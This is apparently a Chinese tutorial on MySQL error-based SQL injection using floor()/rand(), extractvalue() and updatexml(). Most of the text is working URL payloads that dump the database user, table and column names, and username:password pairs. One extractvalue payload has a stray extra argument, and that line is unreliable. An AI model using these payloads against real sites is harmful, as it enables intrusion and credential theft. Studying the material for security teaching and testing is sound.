0x00_报错注入原理
构造报错payload让信息通过报错信息回显出来。在查询不回现内容,会答应错误信息。Update、insert等语句,会打印错误信息。
0x01_报错注入操作
floor()报错注入
mysql模板:
concat:连接字符串功能
floor:去整数值
rand:取0~1之间的随机浮点值
group by:根据一个或多个列对结果集进行分组并有排序功能
select count(*) from information_schema.tables group by concat((select version()),floor(rand(0)*2));
原因:group by 对rand()函数进行操作时产生错误
注入演示:
/?id=1' and (select count(*) from information_schema.tables group by concat((select version()),floor(rand(0)*2)))--+
/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select user()),0x7e,floor(rand(0)*2)))--+
查询表
/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+
表中信息
/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 0,1),0x7e,floor(rand(0)*2)))--+
/?id=1' and (select count(*) from information_schema.tables group by concat(0x7e,(select concat(username,0x7e,password) from users limit 0,1),0x7e,floor(rand(0)*2)))--+
extractvalue()报错注入
模板:
extractvalue(1,concat(0x7e,(select user()),0x7e));
原因:XPATH语法错误产生报错
/?id=1' and extractvalue(1,concat(0x7e,(select user()),0x7e),1)--+
updatexml()报错注入
模板:
select updatexml(1,concat(0x7e,(select user()),0x7e),1);
原因:XPATH语法错误产生报错
注入演示:
/?id=1' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+
扫描二维码关注公众号,回复:
9647080 查看本文章
/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)--+
/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 0,1),0x7e),1)--+
/?id=1' and updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),1)--+
0x02_对数据的截取
substr()
/?id=1' and updatexml(1,concat(0x7e,(select substr(concat(username,0x3a,password),1,1) from users limit 0,1),0x7e),1)--+
